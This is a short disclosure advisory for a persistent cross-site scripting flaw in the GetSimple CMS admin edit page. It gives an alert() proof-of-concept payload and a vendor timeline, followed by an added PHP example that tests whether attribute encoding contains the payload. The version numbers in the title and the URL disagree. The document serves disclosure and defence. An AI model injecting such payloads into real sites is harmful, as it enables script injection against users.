GetSimple CMS version 5.7.3.1 suffers from a persistent cross-site scripting vulnerability.
#Date: 29/06/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: Persistent XSS
#Tested on: Windows 7
#Product: GetSimple CMS
#Version: 5.7.3.1
#Description: The application is vulnerable to a persistent XSS attack on the following page.
URL - https://localhost/Getsimplecms-3.3.5/admin/edit.php?id=temp&upd=edit-success&type=edit
Payload - ">img src="blah.jpg" onerror="alert('XSS')"/
Notified Vendor: May 20, 2015
Response: June 19, 2015
Closure: June 23, 2015 (https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1046)
--
Regards,
*Joel V*
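
The payload above opens with `">`, which closes a quoted attribute value and the tag around it. The PHP below is an added example, not code from GetSimple CMS or from the advisory: the field name `example_field` and the markup are assumptions, since the advisory does not say which field of edit.php is affected. It renders the payload string exactly as printed above with and without attribute encoding, then parses the output to check whether the stored value stayed inside the attribute (requires PHP's DOM extension).

```php
<?php
// Added example; not GetSimple CMS code. Field name and markup are hypothetical.

// Payload string exactly as printed in the advisory.
$stored = '">img src="blah.jpg" onerror="alert(\'XSS\')"/';

// Vulnerable pattern: stored value concatenated straight into an attribute.
function render_unsafe(string $v): string {
    return '<input type="text" name="example_field" value="' . $v . '">';
}

// Hardened pattern: encode for an HTML attribute context, both quote styles.
function render_safe(string $v): string {
    $enc = htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="example_field" value="' . $enc . '">';
}

// Regression check: parse the rendered HTML and report what the browser-side
// parser would see as the input's value, and any text that leaked out of it.
function audit(string $html): array {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate malformed markup quietly
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    $body  = $doc->getElementsByTagName('body')->item(0);
    return [
        'value'  => $input->getAttribute('value'),
        'leaked' => trim($body->textContent),
    ];
}

// The value is contained only if it round-trips intact and nothing leaks.
function is_contained(string $stored, string $html): bool {
    $r = audit($html);
    return $r['value'] === $stored && $r['leaked'] === '';
}

foreach (['render_unsafe', 'render_safe'] as $fn) {
    $html = $fn($stored);
    printf("%-14s contained=%s\n", $fn, var_export(is_contained($stored, $html), true));
    var_export(audit($html));
    echo "\n";
}
```

The same `is_contained` check can be run in a test suite against every template that echoes stored page fields back into the admin edit form.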